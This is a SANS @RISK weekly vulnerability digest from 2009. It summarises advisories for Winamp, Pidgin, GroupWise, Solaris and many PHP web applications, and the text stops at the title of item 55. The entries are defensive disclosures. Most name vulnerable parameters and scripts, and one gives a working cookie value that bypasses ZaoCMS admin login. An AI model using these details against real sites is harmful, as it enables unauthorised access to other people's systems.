@RISK: The Consensus Security Vulnerability Alert

Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)

• (1) CRITICAL: Apple QuickTime PICT Heap Overflow Vulnerability
• (2) CRITICAL: BlackBerry Attachment Service PDF distiller Multiple Vulnerabilities
• (3) HIGH: Novell GroupWise Multiple Vulnerabilities
• (4) LOW: ImageMagick Integer Overflow Vulnerability
• (5) LOW: CiscoWorks Common Services TFTP Directory Traversal Vulnerability

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)

Third Party Windows Apps

• 09.22.1 - Nullsoft Winamp "gen_ff.dll" Buffer Overflow
• 09.22.2 - Soulseek Distributed File Search Buffer Overflow
• 09.22.3 - SonicWALL Global VPN Client "RampartSvc" Local Privilege Escalation
• 09.22.4 - SonicWALL Global Security Client Local Privilege Escalation

Linux

• 09.22.5 - Red Hat Certificate System Agent Group Security Bypass

Solaris

• 09.22.6 - Sun Solaris Secure Digital Slot Driver (sdhost(7D)) Local Code Execution
• 09.22.7 - Sun Solaris "sadmind" Daemon Multiple Buffer Overflow Vulnerabilities

Aix

• 09.22.8 - IBM AIX "MALLOCDEBUG" File Overwrite

Novell

• 09.22.9 - Novell GroupWise Internet Agent Email Address Processing Buffer Overflow
• 09.22.10 - Novell GroupWise Internet Agent SMTP Request Processing Buffer Overflow
• 09.22.11 - Novell GroupWise WebAccess Multiple Security Vulnerabilities

Cross Platform

• 09.22.12 - CiscoWorks Common Services TFTP Server Directory Traversal
• 09.22.13 - Drupal Email Verification Module Cross-Site Scripting and Information Disclosure Vulnerabilities
• 09.22.14 - Pidgin Multiple Buffer Overflow Vulnerabilities
• 09.22.15 - Multiple Panda Products TAR/CAB Files Scan Evasion
• 09.22.16 - Serena Dimensions CM SSL Certificate Signature Verification
• 09.22.17 - IPFilter "ippool" "lib/load_http.c" Local Buffer Overflow
• 09.22.18 - Wireshark PCNFSD Dissector Denial of Service
• 09.22.19 - Open Handset Alliance Android Signature Validation Local Privilege Escalation
• 09.22.20 - SonicWALL Global VPN Client Log File Remote Format String
• 09.22.21 - Lighttpd Trailing Slash Information Disclosure
• 09.22.22 - Multiple ArcaBit ArcaVir Products Multiple IOCTL Request Local Privilege Escalation Vulnerabilities
• 09.22.23 - BlackBerry Attachment Service PDF Distiller Multiple Unspecified Security Vulnerabilities
• 09.22.24 - ImageMagick TIFF File Integer Overflow

Web Application - Cross Site Scripting

• 09.22.25 - Novell GroupWise WebAccess "gw/webacc" Multiple Cross-Site Scripting Vulnerabilities
• 09.22.26 - Steam "steam://" Cross-Site Scripting
• 09.22.27 - IPplan "grp" Parameter Cross-Site Scripting
• 09.22.28 - Kingsoft WebShield Cross-Site scripting and Remote Command Execution
• 09.22.29 - Catviz Multiple Local File Include and Cross-Site Scripting Vulnerabilities
• 09.22.30 - Sun Java System Communications Express "search.xml" Cross-Site Scripting
• 09.22.31 - Sun Java System Communications Express "UWCMain" Cross-Site Scripting
• 09.22.32 - Web Conference Room Free Unspecified Cross-Site Scripting
• 09.22.33 - a-News Unspecified Cross-Site Scripting
• 09.22.34 - DotNetNuke "ErrorPage.aspx" Cross-Site Scripting
• 09.22.35 - Sun Java System Portal Server Error Page Cross-Site Scripting

Web Application - SQL Injection

• 09.22.36 - Article Directory Script "yad-admin/login.php" SQL Injection
• 09.22.37 - Flash Quiz Multiple SQL Injection Vulnerabilities
• 09.22.38 - Your Articles Directory "page.php" SQL Injection
• 09.22.39 - IPcelerate IPsession Unspecified SQL Injection
• 09.22.40 - DM FileManager "Username" and "Password" SQL Injection Vulnerabilities
• 09.22.41 - Joomla! Casino Component "Itemid" Parameter Multiple SQL Injection Vulnerabilities
• 09.22.42 - Realty Web-Base "list_list.php" Parameter SQL Injection
• 09.22.43 - Scripts for Sites EZ Pub Site "directory.php" SQL Injection
• 09.22.44 - 26th Avenue bSpeak
• 09.22.45 - LxBlog Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
• 09.22.46 - ZaoCMS "admin/modules/Users/edit_user.php" SQL Injection
• 09.22.47 - Saman Portal "pageid" Parameter SQL Injection
• 09.22.48 - Joomla! Boy Scout Advancement "id" Parameter Multiple SQL Injection Vulnerabilities
• 09.22.49 - vbPlaza "name" Parameter SQL Injection
• 09.22.50 - phpBugTracker "index.php" SQL Injection
• 09.22.51 - Graphiks MyForum Login Multiple SQL Injection Vulnerabilities

Web Application

• 09.22.52 - JobScript "mycv.php" Arbitrary File Upload
• 09.22.53 - ZaoCMS Insecure Cookie Authentication Bypass
• 09.22.54 - Profense Web Application Firewall Security Bypass Vulnerabilities
• 09.22.55 - ASP Inline Corporate Calendar Cross-Site Scripting and SQL Injection Vulnerabilities
• 09.22.56 - VICIDIAL Call Center Suite "admin.php" Multiple SQL Injection Vulnerabilities
• 09.22.57 - VidShare Pro SQL Injection and Cross-Site Scripting Vulnerabilities
• 09.22.58 - DMXReady Registration Manager "assetmanager.asp" Arbitrary File Upload
• 09.22.59 - NC GBook "index.php" Remote PHP Code Injection
• 09.22.60 - NC LinkList "index.php" Remote PHP Code Injection
• 09.22.61 - CGI Rescue WEB Mailer HTTP Header Injection
• 09.22.62 - Jorp "functions.php" Authentication Bypass
• 09.22.63 - Drupal Views Bulk Operations Security Bypass
• 09.22.64 - Tutorial Share Insecure Cookie Authentication Bypass
• 09.22.65 - ZaoCMS "upload.php" Arbitrary File Upload
• 09.22.66 - Multiple Mole Group Products "admin.php" Remote Password Change
• 09.22.67 - Zeeways PHOTOVIDEOTUBE Multiple Remote Vulnerabilities
• 09.22.68 - Cute Editor for ASP.NET "file" Parameter Directory Traversal
• 09.22.69 - Basic Analysis And Security Engine Cross-Site Scripting and HTML Injection Vulnerabilities
• 09.22.70 - MiniTwitter SQL Injection and Cross-Site Scripting Vulnerabilities
• 09.22.71 - AMember Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
• 09.22.72 - Dokuwiki "doku.php" Local File Include
• 09.22.73 - WP-Lytebox "main.php" Local File Include
• 09.22.74 - cpCommerce "GLOBALS[prefix]" Local/Remote File Include
• 09.22.75 - RSGallery2 Component for Mambo/Joomla! Backdoor
• 09.22.76 - ZEECAREERS and SHAADICLONE "admin/addadminmembercode.php" Authentication Bypass
• 09.22.77 - RoomPHPlanning Multiple Vulnerabilities

Network Device

• 09.22.78 - Multiple ATEN IP KVM Switches Multiple Remote Vulnerabilities and Weakness

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohan Kotian at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 22, 2009

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 7041 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

• 09.22.1 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Nullsoft Winamp "gen_ff.dll" Buffer Overflow
• Description: Nullsoft Winamp is a media player for Microsoft Windows. The application is exposed to a buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, the issue stems from a type-casting error when parsing a specially crafted ".maki" file in the "gen_ff.dll" library. Winamp versions 5.55 and earlier are affected.
• Ref: http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vu lnerability.html

• 09.22.2 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Soulseek Distributed File Search Buffer Overflow
• Description: Soulseek is a file-sharing application available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue that occurs because it fails to perform adequate boundary checks on user-supplied data. Specifically, this issue occurs when performing a distributed search. Soulseek versions 156 and 157 NS are affected.
• Ref: http://www.securityfocus.com/bid/35091

• 09.22.3 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: SonicWALL Global VPN Client "RampartSvc" Local Privilege Escalation
• Description: SonicWALL Global VPN Client is a VPN solution available for Microsoft Windows. Global VPN Client is prone to a local privilege escalation issue. Specifically, the "RampartSvc" service is run from the "%ProgramFiles%SonicWALLSonicWALL Global VPN Client" folder, which has global access. Global VPN Client version 4.0.0.835 is affected. Ref: https://www.sec-consult.com/files/20090525-3-GVC-privilege-escalation.txt

• 09.22.4 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: SonicWALL Global Security Client Local Privilege Escalation
• Description: SonicWALL Global Security Client is a security application available for Microsoft Windows. The application is exposed to a local privilege escalation issue because it fails to properly drop privileges when performing sensitive actions. Specifically, the system-tray applet runs with SYSTEM-level privileges. Global Security Client version 1.0.0.15 is affected. Ref: https://www.sec-consult.com/files/20090525-2-GSC-privilege-escalation.txt

• 09.22.5 - CVE: CVE-2009-0588
• Platform: Linux
• Title: Red Hat Certificate System Agent Group Security Bypass
• Description: Red Hat Certificate System (RHCS) is an enterprise-level Public Key Infrastructure (PKI) deployment manager. RHCS is exposed to a security bypass issue that occurs when systems are configured to use multiple agent groups. Specifically, this issue allows an agent group to approve or reject certificate requests in queues associated with arbitrary agent groups. RHCS version 7.3 is affected.
• Ref: https://rhn.redhat.com/errata/RHSA-2009-1065.html

• 09.22.6 - CVE: Not Available
• Platform: Solaris
• Title: Sun Solaris Secure Digital Slot Driver (sdhost(7D)) Local Code Execution
• Description: Sun Solaris Secure Digital Slot Driver (sdhost(7D)) is prone to a local code execution vulnerability. Specifically, an attacker with access to the memory card device may corrupt portions of kernel memory or contents of a memory card. Attackers may be able to exploit this issue to execute arbitrary code in the context of the kernel. Successful exploits may completely compromise the vulnerable system. OpenSolaris based on builds snv_105 through snv_108 on x86 platforms is affected.
• Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-259408-1

• 09.22.7 - CVE: CVE-2008-3869, CVE-2008-3870
• Platform: Solaris
• Title: Sun Solaris "sadmind" Daemon Multiple Buffer Overflow Vulnerabilities
• Description: Sun Solaris is exposed to multiple buffer overflow issues that affect the "sadmind(1M)" daemon. Attackers can leverage these issues to execute arbitrary code with superuser privileges. Failed attacks will cause denial of service conditions. Sun Solaris versions 8 and 9 are affected.
• Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-259468-1

• 09.22.8 - CVE: Not Available
• Platform: Aix
• Title: IBM AIX "MALLOCDEBUG" File Overwrite
• Description: IBM AIX is a UNIX-based operating system. The application is exposed to a race condition in the MALLOCDEBUG component of the "libc.a" library. A local attacker can exploit this issue when running a setuid application to overwrite any file on the system.
• Ref: http://www.securityfocus.com/archive/1/503679

• 09.22.9 - CVE: Not Available
• Platform: Novell
• Title: Novell GroupWise Internet Agent Email Address Processing Buffer Overflow
• Description: Novell GroupWise is collaboration software available for a number of platforms, including Linux and Microsoft Windows. GroupWise includes an Internet Agent process for mail transfer. The Internet Agent is exposed to a remote buffer overflow issue. Specifically, this issue stems from a boundary condition error that occurs when handling email addresses via SMTP. Ref: http://www.novell.com/support/viewContent.do?externalId=7003273&sliceId=1

• 09.22.10 - CVE: Not Available
• Platform: Novell
• Title: Novell GroupWise Internet Agent SMTP Request Processing Buffer Overflow
• Description: Novell GroupWise is collaboration software available for a number of platforms, including Linux and Microsoft Windows. GroupWise includes an Internet Agent process for mail transfer. The Internet Agent is exposed to a remote buffer overflow issue. Specifically, this issue stems from a boundary condition error that occurs when handling certain SMTP requests. Ref: http://www.novell.com/support/viewContent.do?externalId=7003272&sliceId=1

• 09.22.11 - CVE: CVE-2009-1634, CVE-2009-1635
• Platform: Novell
• Title: Novell GroupWise WebAccess Multiple Security Vulnerabilities
• Description: Novell GroupWise WebAccess is a secure mobile option for GroupWise collaboration software. The application is exposed to multiple issues. Novell GroupWise WebAccess versions prior to 7.03 HP3 and 8.0.0 HP2 are affected. Ref: http://www.novell.com/support/viewContent.do?externalId=7003266&sliceId=1

• 09.22.12 - CVE: CVE-2009-1161
• Platform: Cross Platform
• Title: CiscoWorks Common Services TFTP Server Directory Traversal
• Description: CiscoWorks Common Services is a component of the CiscoWorks network management product. The Trivial File Transfer Protocol (TFTP) server included with CiscoWorks Common Services is exposed to a directory traversal issue because it fails to sufficiently sanitize user-supplied input in TFTP requests. CiscoWorks Common Services versions 3.0.x, 3.1.x and 3.2.x running on Microsoft Windows are affected.
• Ref: http://www.securityfocus.com/archive/1/503643

• 09.22.13 - CVE: Not Available
• Platform: Cross Platform
• Title: Drupal Email Verification Module Cross-Site Scripting and Information Disclosure Vulnerabilities
• Description: Drupal Email Verification verifies user emails by talking to the appropriate SMTP host. The application is exposed to multiple cross-site scripting issues that affect the "username" and "email address" parameters; and an information disclosure issue that allows attackers to view the list of unconfirmed email addresses. Email Verification versions 5.x-1.x prior to 5.x-2.1 and 6.x prior to 6.x-1.2 are affected.
• Ref: http://drupal.org/node/468452

• 09.22.14 - CVE: CVE-2009-1376, CVE-2009-1375, CVE-2009-1374,CVE-2009-1373
• Platform: Cross Platform
• Title: Pidgin Multiple Buffer Overflow Vulnerabilities
• Description: Pidgin is a multiplatform instant-messaging client that supports multiple messaging protocols. Pidgin is exposed to multiple buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data. Pidgin versions prior to 2.5.6 are affected.
• Ref: http://www.pidgin.im/news/security/?id=29

• 09.22.15 - CVE: Not Available
• Platform: Cross Platform
• Title: Multiple Panda Products TAR/CAB Files Scan Evasion
• Description: Panda develops antivirus products. Multiple Panda products are exposed to an issue that may allow certain compressed archives to bypass the scan engine. The vulnerability occurs because the software fails to properly inspect specially crafted "TAR" and "CAB" archive files. Ref: http://www.pandasecurity.com/homeusers/support/card?id=70025&idIdioma=2

• 09.22.16 - CVE: Not Available
• Platform: Cross Platform
• Title: Serena Dimensions CM SSL Certificate Signature Verification
• Description: Serena Dimensions CM is a software development tool. The Dimensions CM Client is exposed to a signature verification issue. Specifically, the client fails to properly verify signatures when communications are encrypted using SSL. This allows an arbitrary, signed signature to be accepted by the client. Serena Dimensions CM version 10.1 is affected.
• Ref: http://www.securityfocus.com/archive/1/503730

• 09.22.17 - CVE: CVE-2009-1476
• Platform: Cross Platform
• Title: IPFilter "ippool" "lib/load_http.c" Local Buffer Overflow
• Description: IPFilter is a firewall and network address translation (NAT) implementation for BSD, Linux, and Unix operating systems. IPFilter is exposed to a local buffer overflow issue because it fails to adequately bounds check user-supplied input. The issue occurs in the "lib/load_http.c" source file and can be triggered with excessively long input to URIs handled by the "load_http()" function. This function is used by the "ippool" application. IPFilter version 4.1.31 is affected. Ref: http://cvsweb.netbsd.org/bsdweb.cgi/src/dist/ipf/lib/load_http.c?rev=1.2&content-type=text/x-cvsweb-markup&only_with_tag=MAIN

• 09.22.18 - CVE: Not Available
• Platform: Cross Platform
• Title: Wireshark PCNFSD Dissector Denial of Service
• Description: Wireshark (formerly Ethereal) is an application for analyzing network traffic; it is available for Microsoft Windows and UNIX-like operating systems. Wireshark is exposed to a denial of service issue that affects the "PCNFSD" dissector. Wireshark versions 0.8.20 through 1.0.7 are affected.
• Ref: http://www.wireshark.org/security/wnpa-sec-2009-03.html

• 09.22.19 - CVE: CVE-2009-1754
• Platform: Cross Platform
• Title: Open Handset Alliance Android Signature Validation Local Privilege Escalation
• Description: Open Handset Alliance Android (previously Google Android) is a software stack and operating system for mobile phones. Android allows multiple applications to share a uid (user ID) when they are signed by the same vendor and request to do so when installed. Android is exposed to a privilege escalation issue due to a failure to properly enforce restrictions on this behavior. Android versions 1.5 CRB17 through 1.5 CRB42 are affected.
• Ref: http://www.ocert.org/advisories/ocert-2009-006.html

• 09.22.20 - CVE: Not Available
• Platform: Cross Platform
• Title: SonicWALL Global VPN Client Log File Remote Format String
• Description: SonicWALL Global VPN Client provides virtual private networking for mobile users. The application is exposed to a remote format string issue because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted printing function. This issue occurs in an unspecified function that handles logfile parsing. Global VPN Client version 4.0.0.2-51e Standard and Enhanced are affected.
• Ref: http://www.securityfocus.com/archive/1/503833

• 09.22.21 - CVE: Not Available
• Platform: Cross Platform
• Title: Lighttpd Trailing Slash Information Disclosure
• Description: Lighttpd is a freely available webserver application. Lighttpd is exposed to an information disclosure issue that occurs when an attacker specifies a file followed by a trailing slash (""). The attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Lighttpd version 1.4.23 is affected.
• Ref: http://redmine.lighttpd.net/issues/1989

• 09.22.22 - CVE: Not Available
• Platform: Cross Platform
• Title: Multiple ArcaBit ArcaVir Products Multiple IOCTL Request Local Privilege Escalation Vulnerabilities
• Description: ArcaBit ArcaVir are security products for Microsoft Windows platforms. The applications are exposed to multiple local privilege escalation issues because the "ps_drv.sys" driver fails to properly validate user-space input before writing it to the "Deviceps_drv" device.
• Ref: http://ntinternals.org/ntiadv0814/ntiadv0814.html

• 09.22.23 - CVE: Not Available
• Platform: Cross Platform
• Title: BlackBerry Attachment Service PDF Distiller Multiple Unspecified Security Vulnerabilities
• Description: BlackBerry Attachment Service is a component of BlackBerry Enterprise Server and BlackBerry Professional Software; it is used to process email attachments. BlackBerry Attachment Service is exposed to multiple remote code execution issues that occur when the service's PDF distiller tries to process specially crafted PDF files. Ref: http://www.blackberry.com/btsc/dynamickc.do?externalId=KB18327&sliceID=1&command=show&forward=nonthreadedKC&kcId=KB18327

• 09.22.24 - CVE: Not Available
• Platform: Cross Platform
• Title: ImageMagick TIFF File Integer Overflow
• Description: ImageMagick is an image-editing suite that includes a library and command-line utilities supporting numerous image formats, including TIFF. It is available for various platforms, including Microsoft Windows, UNIX, and UNIX-like operating systems. ImageMagick is exposed to an integer overflow issue because it fails to perform adequate boundary checks on user-supplied data. The vulnerability occurs when handling malformed TIFF files. ImageMagick version 6.5.2-8 is affected.
• Ref: http://mirror1.smudge-it.co.uk/imagemagick/www/changelog.html

• 09.22.25 - CVE: CVE-2009-1635
• Platform: Web Application - Cross Site Scripting
• Title: Novell GroupWise WebAccess "gw/webacc" Multiple Cross-Site Scripting Vulnerabilities
• Description: Novell GroupWise WebAccess is a secure mobile option for GroupWise collaboration software. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
• Ref: http://www.securityfocus.com/archive/1/503700

• 09.22.26 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Steam "steam://" Cross-Site Scripting
• Description: Steam is a gaming application. The application is exposed to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. Specifically, the issue occurs when a malicious request is sent through the "steam://" protocol.
• Ref: http://www.securityfocus.com/bid/35036

• 09.22.27 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: IPplan "grp" Parameter Cross-Site Scripting
• Description: IPplan is an open-source IP address management and planning web application. It is programmed in PHP, and stores its information in an SQL database. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input. Specifically, the issue affects the "grp" parameter in the "admin/usermanager" page. IPplan version 4.91a is affected.
• Ref: http://holisticinfosec.org/content/view/113/45/

• 09.22.28 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Kingsoft WebShield Cross-Site scripting and Remote Command Execution
• Description: Kingsoft WebShield is an application that protects a user's browser against malware. The application is exposed to a remote cross-site scripting and command execution issue because it fails to properly filter HTML tags from URIs. WebShield versions 1.1.0.62 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/35038

• 09.22.29 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Catviz Multiple Local File Include and Cross-Site Scripting Vulnerabilities
• Description: Catviz is a web-based content manager. The application is exposed to multiple issues because it fails to properly sanitize user-supplied input. The attacker may leverage a cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Catviz version 0.4 beta 1 is affected.
• Ref: http://www.securityfocus.com/bid/35042

• 09.22.30 - CVE: CVE-2009-1729
• Platform: Web Application - Cross Site Scripting
• Title: Sun Java System Communications Express "search.xml" Cross-Site Scripting
• Description: Sun Java System Communications Express is a web-based client for the Sun Java Communications Suite. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. This issue affects the "abperson_displayName" parameter of the "search.xml" script. Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6 and Sun Java System Communications Express 6 2005Q4 (6.2) are affected.
• Ref: http://www.securityfocus.com/archive/1/503675

• 09.22.31 - CVE: CVE-2009-1729
• Platform: Web Application - Cross Site Scripting
• Title: Sun Java System Communications Express "UWCMain" Cross-Site Scripting
• Description: Sun Java System Communications Express is a web-based client for the Sun Java Communications Suite. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. This issue affects the "temporaryCalendars" parameter of the "UWCMain" script. Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6 and Sun Java System Communications Express 6 2005Q4 (6.2) are affected.
• Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-258068-1

• 09.22.32 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Web Conference Room Free Unspecified Cross-Site Scripting
• Description: Web Conference Room Free is a web-based conferencing application. The application is exposed to an unspecified cross-site scripting issue because it fails to sanitize user-supplied input. Web Conference Room Free versions prior to 1.6.4 are affected.
• Ref: http://www.securityfocus.com/bid/35068

• 09.22.33 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: a-News Unspecified Cross-Site Scripting
• Description: a-News is a web-based application used to post news items. The application is exposed to an unspecified cross-site scripting issue because it fails to sanitize user-supplied input. a-News version 2.32 is affected.
• Ref: http://www.securityfocus.com/bid/35070

• 09.22.34 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: DotNetNuke "ErrorPage.aspx" Cross-Site Scripting
• Description: DotNetNuke is an open-source framework used to create and deploy websites. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "error" parameter of the "ErrorPage.aspx" script. DotNetNuke versions prior to 4.9.4 are affected.
• Ref: http://www.securityfocus.com/archive/1/503723

• 09.22.35 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Sun Java System Portal Server Error Page Cross-Site Scripting
• Description: Sun Java System Portal Server is a Java-based framework for developing web applications. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. This issue exists in one of the error pages. Sun Java System Portal Server versions 6.3.1, 7.1 and 7.2 are affected.
• Ref: http://www.securityfocus.com/bid/35079

• 09.22.36 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Article Directory Script "yad-admin/login.php" SQL Injection
• Description: Article Directory Script is a PHP-based content management application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "User Name" textbox when logging in as an administrator via the "yad-admin/login.php" script.
• Ref: http://www.securityfocus.com/bid/35059

• 09.22.37 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Flash Quiz Multiple SQL Injection Vulnerabilities
• Description: Flash Quiz is a PHP-based quiz application. Flash Quiz is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data. Flash Quiz Beta version 2 is affected.
• Ref: http://www.securityfocus.com/bid/35060

• 09.22.38 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Your Articles Directory "page.php" SQL Injection
• Description: Your Articles Directory is a PHP-based content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "page.php" script.
• Ref: http://www.securityfocus.com/bid/35062

• 09.22.39 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: IPcelerate IPsession Unspecified SQL Injection
• Description: IPcelerate IPsession is an IP telephony device; the device has a web-based management interface listening on TCP port 8090. The device's web-based interface is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query to unspecified scripts and parameters used in the authentication process.
• Ref: http://www.securityfocus.com/archive/1/503686

• 09.22.40 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: DM FileManager "Username" and "Password" SQL Injection Vulnerabilities
• Description: DM FileManager is a web-based file management tool. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "Username" and "Password" fields in the admin login page before using it in an SQL query. DM FileManager version 3.9.2 is affected.
• Ref: http://www.securityfocus.com/bid/35035

• 09.22.41 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Joomla! Casino Component "Itemid" Parameter Multiple SQL Injection Vulnerabilities
• Description: Casino is a gambling component for the Joomla! content manager. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "Itemid" parameter. Casino version 0.3.1 is affected.
• Ref: http://www.securityfocus.com/bid/35041

• 09.22.42 - CVE: CVE-2009-1751
• Platform: Web Application - SQL Injection
• Title: Realty Web-Base "list_list.php" Parameter SQL Injection
• Description: Realty Web-Base is a content manager application. The module is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "list_list.php" script before using it an SQL query. Realty Web-Base version 1.0 is affected.
• Ref: http://www.securityfocus.com/bid/35043

• 09.22.43 - CVE: CVE-2008-6794
• Platform: Web Application - SQL Injection
• Title: Scripts for Sites EZ Pub Site "directory.php" SQL Injection
• Description: Scripts for Sites EZ Pub Site is a web-based application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter of the "directory.php" script before using it in an SQL query.
• Ref: http://www.securityfocus.com/bid/35046

• 09.22.44 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: 26th Avenue bSpeak
• Description: 26th Avenue bSpeak is a threaded message board. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "forumid" parameter of the "forum/index.php' script before using it in an SQL query. 26th Avenue bSpeak version 1.10 is affected.
• Ref: http://www.securityfocus.com/bid/35049

• 09.22.45 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: LxBlog Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
• Description: LxBlog is a PHP-based blogging application. The application is exposed to multiple issues, because it fails to adequately sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
• Ref: http://www.securityfocus.com/bid/35071

• 09.22.46 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: ZaoCMS "admin/modules/Users/edit_user.php" SQL Injection
• Description: ZaoCMS is a PHP-based content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "user_id" parameter of the "admin/modules/Users/edit_user.php" script.
• Ref: http://www.securityfocus.com/bid/35077

• 09.22.47 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Saman Portal "pageid" Parameter SQL Injection
• Description: Saman Portal is a web-based application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "pageid" parameter of the "index.php" script.
• Ref: http://www.securityfocus.com/bid/35084

• 09.22.48 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Joomla! Boy Scout Advancement "id" Parameter Multiple SQL Injection Vulnerabilities
• Description: Boy Scout Advancement (BSAdv) is a scout component for the Joomla! content manager. The component is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "id" parameter when the "task" parameter is set to the following: "event" and "account". Boy Scout Advancement version 0.3 is affected.
• Ref: http://www.securityfocus.com/archive/1/503794

• 09.22.49 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: vbPlaza "name" Parameter SQL Injection
• Description: vbPlaza is a forum module for vBulletin. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "name" parameter of the "vbplaza.php" script before using it in an SQL query.
• Ref: http://www.securityfocus.com/bid/35099

• 09.22.50 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: phpBugTracker "index.php" SQL Injection
• Description: phpBugTracker is an incident management system. phpBugTracker is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "password" parameter of the "index.php" script before using it an SQL query. phpBugTracker version 1.0.3 is affected.
• Ref: http://www.securityfocus.com/bid/35101

• 09.22.51 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Graphiks MyForum Login Multiple SQL Injection Vulnerabilities
• Description: Graphiks MyForum is a web-based application. The application is exposed to multiple SQL injection issues because it fails to adequately sanitize user-supplied input to the "Username" and "Password" fields of the login script. MyForum version 1.3 is affected.
• Ref: http://www.securityfocus.com/bid/35096

• 09.22.52 - CVE: Not Available
• Platform: Web Application
• Title: JobScript "mycv.php" Arbitrary File Upload
• Description: JobScript is a PHP-based job board. The application is exposed to an issue that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately validate user-supplied input before uploading files via the "mycv.php" script. JobScript version 2.0 is affected.
• Ref: http://www.securityfocus.com/bid/35058

• 09.22.53 - CVE: Not Available
• Platform: Web Application
• Title: ZaoCMS Insecure Cookie Authentication Bypass
• Description: ZaoCMS is a web application. The application is exposed to an authentication bypass issue because it fails to adequately verify user-supplied input used for cookie-based authentication. Specifically, attackers can gain administrative access to the application by setting the "admin" cookie parameter to "stgAdmin" and the "path" parameter to "/" via the "admin/login.php" script.
• Ref: http://www.securityfocus.com/bid/35063

• 09.22.54 - CVE: CVE-2009-1594, CVE-2009-1593
• Platform: Web Application
• Title: Profense Web Application Firewall Security Bypass Vulnerabilities
• Description: Profense is a web application firewall. Profense is exposed to multiple remote issues. An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks. Profense versions prior to 2.4.4 and 2.2.22 are affected.
• Ref: http://www.securityfocus.com/archive/1/503649

• 09.22.55 - CVE: Not Available
• Platform: Web Application
• Title: ASP Inline Corporate Calendar Cross-Site Scripting and SQL Injection Vulnerabilities
